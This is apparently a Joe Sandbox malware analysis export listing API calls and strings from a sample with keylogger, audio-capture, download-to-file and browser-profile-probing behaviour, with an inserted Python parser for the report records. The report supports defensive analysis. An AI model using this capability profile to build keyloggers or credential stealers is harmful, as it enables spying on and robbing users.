                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                          APIs
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Yara matches
                                          Similarity
                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                          • String ID: image/jpeg
                                          • API String ID: 1291196975-3785015651
                                          • Opcode ID: f7762c1077cd22b9d0966c79a8c7972fb49086d0d121f5f9ad0777a9e048a50c
                                          • Instruction ID: b1b0a2c635f45e8130f4767810c6fbb161559e0826da6e7acb487c9aae22ef17
                                          • Opcode Fuzzy Hash: f7762c1077cd22b9d0966c79a8c7972fb49086d0d121f5f9ad0777a9e048a50c
                                          • Instruction Fuzzy Hash: 6D316F72504310AFC701EF65C884D6FB7E9EF8A304F00496EF98597251DB7999048B66
                                          APIs
                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ACP$OCP
                                          • API String ID: 0-711371036
                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                          APIs
                                          • _wcslen.LIBCMT ref: 00416330
                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen$CloseCreateValue
                                          • String ID: !D@$okmode
                                          • API String ID: 3411444782-1942679189
                                          • Opcode ID: ffd0034025ce8a6f256035d87f0428f79cac076b847b20a61f7d23f5852e07e7
                                          • Instruction ID: 3691d04bdc76b081f03c0e50e7d604d291fd2bc6213442c77ae478975c73e837
                                          • Opcode Fuzzy Hash: ffd0034025ce8a6f256035d87f0428f79cac076b847b20a61f7d23f5852e07e7
                                          • Instruction Fuzzy Hash: E211A871B042011BDA187B72D822BBD2296DB84349F80483FF50AAF2E2DFBD4C51535D
                                          APIs
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Yara matches
                                          Similarity
                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                          • String ID: image/png
                                          • API String ID: 1291196975-2966254431
                                          • Opcode ID: 5ab440bc048de2cb56d31f74581c152c1f03e682227d906222c769bb8292334a
                                          • Instruction ID: f628a6b37c0337dbee8ef7f798de7cbb8cc54a1da061f00231e4b0513ad08027
                                          • Opcode Fuzzy Hash: 5ab440bc048de2cb56d31f74581c152c1f03e682227d906222c769bb8292334a
                                          • Instruction Fuzzy Hash: 4221C375204211AFC700AB61CC89DBFBBACEFCA314F10452EF54693251DB389945CBA6
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00449CBC
                                          • GetFileType.KERNEL32(00000000), ref: 00449CCE
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleType
                                          • String ID: (Le
                                          • API String ID: 3000768030-2819316628
                                          • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                          • Instruction ID: 0971e15b3ed75ae4f19990cc7af9cd82d4526e04a272429d5fd5d939a02a2197
                                          • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                          • Instruction Fuzzy Hash: EF11907250475246E7308F3E9CC8223BAD5AB52331B38072BD5B7966F1C328DC82F249
                                          APIs
                                          • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 481472006-1507639952
                                          • Opcode ID: b04484f53d8468b4d83ba2a2ead289fcf1640922145b27791008477ae1a99032
                                          • Instruction ID: b700b38ef9f928670de2390b904a97a1cb71e472754ad5b4355c5e73bb52b66b
                                          • Opcode Fuzzy Hash: b04484f53d8468b4d83ba2a2ead289fcf1640922145b27791008477ae1a99032
                                          • Instruction Fuzzy Hash: E62104719007806BD710B732A80A76F7B64E755308F44057EE8491B2A2EB7D5988CBDE
                                          APIs
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: (Le
                                          • API String ID: 269201875-2819316628
                                          • Opcode ID: a20b441ddeb67c9ee691f7cf4a146dca50fcbe4cc28fbe4176985be8152cb82c
                                          • Instruction ID: 50f29c45267cc5de65db45c76c11a9fc4df43ae0f191c64cb21c29ff245d41fa
                                          • Opcode Fuzzy Hash: a20b441ddeb67c9ee691f7cf4a146dca50fcbe4cc28fbe4176985be8152cb82c
                                          • Instruction Fuzzy Hash: 9011D371A002004AEF309F39AC81B563294A714734F15172BF929EA3D6D3BCD8825F89
                                          APIs
                                          • Sleep.KERNEL32 ref: 0041667B
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadFileSleep
                                          • String ID: !D@
                                          • API String ID: 1931167962-604454484
                                          • Opcode ID: 1ca4657709125a85b171c3d25381609667c6d049654dacff53733f257152a229
                                          • Instruction ID: 943aba663a6785b3e55a0e29e9dd0f60b42d3502aaa7a5a348319576c1e2766f
                                          • Opcode Fuzzy Hash: 1ca4657709125a85b171c3d25381609667c6d049654dacff53733f257152a229
                                          • Instruction Fuzzy Hash: 9D1142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                          APIs
                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: | $%02i:%02i:%02i:%03i
                                          • API String ID: 481472006-2430845779
                                          • Opcode ID: c84e5cc4d669c1bab3d4613523f9321b462ddfd430bd9aba11072f60c0a42049
                                          • Instruction ID: dc1ef91952a31d7701eba46fb19b130c3a81cf04c31882e55cbcd77cf5b9c3d8
                                          • Opcode Fuzzy Hash: c84e5cc4d669c1bab3d4613523f9321b462ddfd430bd9aba11072f60c0a42049
                                          • Instruction Fuzzy Hash: 72118E714082455AC304EB62D8519BFB3E9AB44308F50093FF88AA21E1EF3CDA45C69E
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: alarm.wav$xYG
                                          • API String ID: 1174141254-3120134784
                                          • Opcode ID: 295bfd34ad248fa5ae2dae4f6734345cab6275ac0e47a6b15ddca192400cb660
                                          • Instruction ID: fba4c3df788ebc26406fa6248c5b94d62a9d66ba9cb3dc57f05af0bb44f50ff0
                                          • Opcode Fuzzy Hash: 295bfd34ad248fa5ae2dae4f6734345cab6275ac0e47a6b15ddca192400cb660
                                          • Instruction Fuzzy Hash: 78019E7068831166CA04F77688166EE37559B80318F00847FF64A566E2EFBC9A9586CF
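The records above list each function's imported calls with raw hexadecimal arguments, so the meaning of a call such as GetSystemMetrics(0000004C) through GetSystemMetrics(0000004F) (indices 76 to 79, SM_XVIRTUALSCREEN, SM_YVIRTUALSCREEN, SM_CXVIRTUALSCREEN and SM_CYVIRTUALSCREEN, the origin and size of the whole virtual desktop that a screen-capture routine needs) or RegCreateKeyA(80000001, ...) (HKEY_CURRENT_USER) and RegSetValueExA(..., 00000004, ..., 00000004, ...) (a 4-byte REG_DWORD) has to be decoded by hand. The following Python script is an added example, not Joe Sandbox code and not part of this report: it parses the "APIs" records into structured call lists, decodes the constants it has tables for, and attaches coarse capability tags so that records with screen-geometry, registry-write, download or hook behaviour can be pulled out of a long listing. The sample input is excerpted from the records on this page; the tag names are the author's own, and treating GetStdHandle(000000F6) as a sign-extended 8-bit immediate (-10, STD_INPUT_HANDLE, the value the CRT's stdio initialisation passes) is an assumption about how the plugin prints push imm8 operands.

```python
"""Parse a Joe Sandbox report's per-function "APIs" records and decode the raw hex
constants they print. Added example, not Joe Sandbox code; tags are the author's own."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: five records excerpted from the listing above.
SAMPLE = """\
APIs
• GetSystemMetrics.USER32(0000004C), ref: 0041942B
• GetSystemMetrics.USER32(0000004D), ref: 00419431
• GetSystemMetrics.USER32(0000004E), ref: 00419437
• GetSystemMetrics.USER32(0000004F), ref: 0041943D
APIs
• _wcslen.LIBCMT ref: 00416330
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00449CBC
APIs
• Sleep.KERNEL32 ref: 0041667B
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
APIs
• CloseHandle.KERNEL32(?), ref: 0040B0EF
• UnhookWindowsHookEx.USER32 ref: 0040B102
"""

# One call line: optional "Part of subcall function X:" prefix, Api.MODULE, optional
# "(arg,...)" list (stack noise shows as "?"), then "ref: X".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[\w@?$]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")

SM_NAMES = {76: "SM_XVIRTUALSCREEN", 77: "SM_YVIRTUALSCREEN",    # virtual-desktop
            78: "SM_CXVIRTUALSCREEN", 79: "SM_CYVIRTUALSCREEN"}  # origin and size
HKEY_NAMES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
STD_HANDLES = {-10: "STD_INPUT_HANDLE", -11: "STD_OUTPUT_HANDLE", -12: "STD_ERROR_HANDLE"}
TAGS = {"GetSystemMetrics": "screen-geometry", "URLDownloadToFileW": "download-to-file",
        "RegSetValueExA": "registry-write", "RegSetValueExW": "registry-write",
        "SetWindowsHookExA": "windows-hook", "SetWindowsHookExW": "windows-hook",
        "UnhookWindowsHookEx": "windows-hook"}

# args is None when no list is shown; an entry is None where the report printed "?".
Call = namedtuple("Call", "api module args ref subcall notes")

@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)

    @property
    def tags(self) -> List[str]:
        return sorted({TAGS[c.api] for c in self.calls if c.api in TAGS})

def decode_call(api: str, args: Optional[List[Optional[int]]]) -> List[str]:
    """Human-readable notes for the arguments the tables above know about."""
    notes: List[str] = []
    if not args:
        return notes
    if api == "GetSystemMetrics" and args[0] in SM_NAMES:
        notes.append(SM_NAMES[args[0]])
    elif api.startswith(("RegCreateKey", "RegOpenKey")) and args[0] in HKEY_NAMES:
        notes.append(HKEY_NAMES[args[0]])
    elif api.startswith("RegSetValueEx") and len(args) >= 6:
        if args[3] in REG_TYPES:                          # dwType
            notes.append(REG_TYPES[args[3]])
        if args[5] is not None:                           # cbData
            notes.append(f"cbData={args[5]}")
    elif api == "GetStdHandle" and args[0] is not None:
        # Assumption: the plugin prints a "push imm8" operand unsigned (000000F6 for
        # push -10), so 0x80..0xFF is sign-extended back before the lookup.
        v = args[0] - 0x100 if 0x80 <= args[0] <= 0xFF else args[0]
        notes += [n for n in (STD_HANDLES.get(v),) if n]
    return notes

def parse_records(text: str) -> List[Record]:
    """Start a new record at each "APIs" header; keep only lines that parse as calls."""
    records: List[Record] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(Record())
            continue
        m = CALL_RE.match(line)
        if not m or not records:
            continue                                      # hashes, headers, blanks
        raw, args = m.group("args"), None
        if raw is not None:
            args = [None if a.strip() == "?" else int(a, 16)
                    for a in raw.split(",") if a.strip()]
        api = m.group("api")
        records[-1].calls.append(Call(api, m.group("mod"), args, m.group("ref"),
                                      m.group("sub"), decode_call(api, args)))
    return records

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.calls[0].ref, r.tags, [(c.api, c.notes) for c in r.calls])
```

Run against the whole exported report text rather than the excerpt, the same parser gives one record per function; the capability tags are deliberately coarse, since the report's argument values are recovered from the stack heuristically (the "?" entries and the pointer-looking values in the RegSetValueExA line show this), so anything beyond a well-known constant in a fixed argument slot should be confirmed in the disassembly before it is treated as fact.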
                                          APIs
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                          • String ID: Online Keylogger Stopped
                                          • API String ID: 1623830855-1496645233
                                          • Opcode ID: e9861db579dd6a0832a13b67f6620eafbc60b9ba0201637d04cad77b23535cc3
                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                          • Opcode Fuzzy Hash: e9861db579dd6a0832a13b67f6620eafbc60b9ba0201637d04cad77b23535cc3
                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                          APIs
                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                          • _free.LIBCMT ref: 00449B4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnter_free
                                          • String ID: (Le
                                          • API String ID: 1836352639-2819316628
                                          • Opcode ID: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                          • Instruction ID: 49f98359192604db3700e7d46e2ee0879056decf89b11c46129577f8840becb7
                                          • Opcode Fuzzy Hash: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                          • Instruction Fuzzy Hash: C3115E31500214DFEB20DFA8E846B5D73B0FB04724F10455AE8599B2E6CBBCEC429B0D
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • _abort.LIBCMT ref: 0044F129
                                          • _free.LIBCMT ref: 0044F15D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_abort_free
                                          • String ID: 0ce
                                          • API String ID: 289325740-2820837681
                                          • Opcode ID: 870bd59091670ef6f85687353f23d3fa7adaacf8e57ceb1d53a868e14bc6891b
                                          • Instruction ID: a8e40e627a719db10bf70d85eeadc0c4c2fb790701f4ec7f842983f146219858
                                          • Opcode Fuzzy Hash: 870bd59091670ef6f85687353f23d3fa7adaacf8e57ceb1d53a868e14bc6891b
                                          • Instruction Fuzzy Hash: 0501A1B1D01A21DBEB31AFA9D84265EB3A0BF04720B19012FE51463391CB386D46CBCE
                                          APIs
                                          • waveInPrepareHeader.WINMM(0064F510,00000020,?,?,00476B60,00474EF0,?,00000000,00401A15), ref: 00401849
                                          • waveInAddBuffer.WINMM(0064F510,00000020,?,00000000,00401A15), ref: 0040185F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferHeaderPrepare
                                          • String ID: hMG
                                          • API String ID: 2315374483-350922481
                                          • Opcode ID: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
                                          • Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
                                          • Opcode Fuzzy Hash: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
                                          • Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: $G
                                          • API String ID: 269201875-4251033865
                                          • Opcode ID: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                          • Instruction ID: 4a6f060c21597e0392f33703011e6e0157da39883ddad7ec559e06d861eb6f1f
                                          • Opcode Fuzzy Hash: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                          • Instruction Fuzzy Hash: 64E0E532A0152014F6713A3B6D1665B45C68BC1B3AF22423FF425962C2DFAC8946516E
                                          APIs
                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocaleValid
                                          • String ID: IsValidLocaleName$kKD
                                          • API String ID: 1901932003-3269126172
                                          • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                          • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                          • API String ID: 1174141254-4188645398
                                          • Opcode ID: 4859c672d659d0a1f097c4b87d24339a57335e4ea3a93cd47a728b5256189360
                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                          • Opcode Fuzzy Hash: 4859c672d659d0a1f097c4b87d24339a57335e4ea3a93cd47a728b5256189360
                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                          • API String ID: 1174141254-2800177040
                                          • Opcode ID: f0c0cc8675646142fd89bdb58ed4d14c68212bf39b1608070b4045de8f02391f
                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                          • Opcode Fuzzy Hash: f0c0cc8675646142fd89bdb58ed4d14c68212bf39b1608070b4045de8f02391f
                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
